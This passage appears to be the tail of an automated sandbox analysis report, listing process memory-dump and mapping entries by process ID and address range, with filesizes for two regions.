                                                                                                                      • memory/5352-294-0x0000000000400000-0x0000000002FCF000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        43.8MB

                                                                                                                      • memory/5412-366-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5436-335-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5484-350-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5520-351-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5564-252-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5644-358-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5676-347-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5708-365-0x0000000000416222-mapping.dmp
                                                                                                                      • memory/5784-251-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5804-216-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5816-348-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5844-344-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5868-359-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5912-363-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5968-311-0x00000000037C0000-0x00000000037D0000-memory.dmp
                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5968-229-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/5976-237-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6012-260-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6076-356-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6080-340-0x0000000000000000-mapping.dmp
                                                                                                                      • memory/6096-346-0x0000000000000000-mapping.dmp